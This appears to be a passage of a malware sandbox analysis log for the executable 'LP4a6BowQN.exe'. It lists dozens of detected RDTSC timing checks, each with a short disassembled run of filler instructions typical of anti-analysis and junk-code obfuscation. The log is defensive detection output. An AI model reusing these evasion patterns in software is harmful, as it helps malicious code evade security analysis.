                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A4321E second address: A43230 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC8BCD0701Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A4519B second address: A451A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A451A1 second address: A451DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC8BCD07018h 0x0000000c jmp 00007FC8BCD07022h 0x00000011 jmp 00007FC8BCD0701Eh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a js 00007FC8BCD07016h 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A495EA second address: A495F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A497B3 second address: A497B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A497B7 second address: A497BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A49914 second address: A49919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A49919 second address: A49932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF15h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A49932 second address: A49936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: A49936 second address: A4993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exe RDTSC instruction interceptor: First address: 9A9D5B second address: 9A9DA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FC8BCD07016h 0x00000019 popad 0x0000001a jmp 00007FC8BCD07021h 0x0000001f pushad 0x00000020 push edx 0x00000021 pop edx 0x00000022 jng 00007FC8BCD07016h 0x00000028 pushad 0x00000029 popad 0x0000002a jnp 00007FC8BCD07016h 0x00000030 popad 0x00000031 push ebx 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4DF07 second address: A4DF13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4DF13 second address: A4DF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4E4CC second address: A4E4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55F3C second address: A55F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FC8BCD07028h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A53F3D second address: A53F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF17h 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A540C0 second address: A540F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07020h 0x00000009 popad 0x0000000a jmp 00007FC8BCD07029h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A544BD second address: A544C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A544C2 second address: A544CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A54AD1 second address: A54AED instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCFEEF06h 0x00000008 jmp 00007FC8BCFEEF0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A54AED second address: A54AF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A54AF7 second address: A54B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ch 0x00000007 jp 00007FC8BCFEEF06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55010 second address: A55016 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55016 second address: A55032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55032 second address: A55036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5561E second address: A55641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Dh 0x00000009 jmp 00007FC8BCFEEF0Fh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55947 second address: A5594D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5594D second address: A5595F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A59E9D second address: A59EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07026h 0x00000007 jmp 00007FC8BCD0701Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A024 second address: A5A02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A02A second address: A5A02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A2CD second address: A5A2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A5C0 second address: A5A5E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC8BCD07023h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A5E8 second address: A5A612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC8BCFEEF12h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A612 second address: A5A61C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B31 second address: A67B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B35 second address: A67B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B41 second address: A67B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B47 second address: A67B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B4B second address: A67B57 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCFEEF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B57 second address: A67B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B5C second address: A67B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B62 second address: A67B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC8BCD07016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A65F30 second address: A65F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A65F36 second address: A65F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A65F3E second address: A65F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A661E1 second address: A661E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A661E5 second address: A661EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A661EB second address: A66213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC8BCD07016h 0x00000009 jmp 00007FC8BCD07021h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 js 00007FC8BCD07016h 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66351 second address: A6635D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6635D second address: A66361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66619 second address: A6661D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6661D second address: A6662C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6662C second address: A6664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FC8BCFEEF19h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A667A5 second address: A667AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A667AA second address: A667BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a jns 00007FC8BCFEEF06h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66A39 second address: A66A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66A3F second address: A66A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66A45 second address: A66A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A672A5 second address: A672C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF06h 0x00000008 jmp 00007FC8BCFEEF12h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A679B8 second address: A679E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC8BCD07028h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jg 00007FC8BCD07018h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A679E4 second address: A679EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6BA5A second address: A6BA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6BA5E second address: A6BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6FC37 second address: A6FC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6FC3B second address: A6FC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5C6 second address: A6F5D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5D0 second address: A6F5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5D8 second address: A6F5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5DC second address: A6F5F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F76B second address: A6F78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC8BCD0702Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F78E second address: A6F794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F794 second address: A6F7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07020h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F903 second address: A6F912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F912 second address: A6F92D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07025h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F92D second address: A6F932 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7A1AE second address: A7A1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7EE67 second address: A7EE7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7EE7C second address: A7EEA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07025h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC8BCD0701Dh 0x0000000e jnl 00007FC8BCD07016h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E847 second address: A7E87D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC8BCFEEF12h 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007FC8BCFEEF12h 0x00000014 jns 00007FC8BCFEEF06h 0x0000001a jl 00007FC8BCFEEF06h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FC8BCFEEF06h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E87D second address: A7E881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E881 second address: A7E88A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E88A second address: A7E89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC8BCD07016h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E89B second address: A7E89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E9CF second address: A7E9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FC8BCD07016h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A91523 second address: A91527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A91527 second address: A9153F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC8BCD07022h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B3E6C second address: 9B3E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B3E72 second address: 9B3E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B3E76 second address: 9B3E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AA9 second address: A98AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC8BCD0701Ch 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AD0 second address: A98AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AE7 second address: A98AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC8BCD0702Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AFE second address: A98B08 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8BCFEEF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F3F second address: A98F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC8BCD07016h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F4C second address: A98F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F5A second address: A98F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
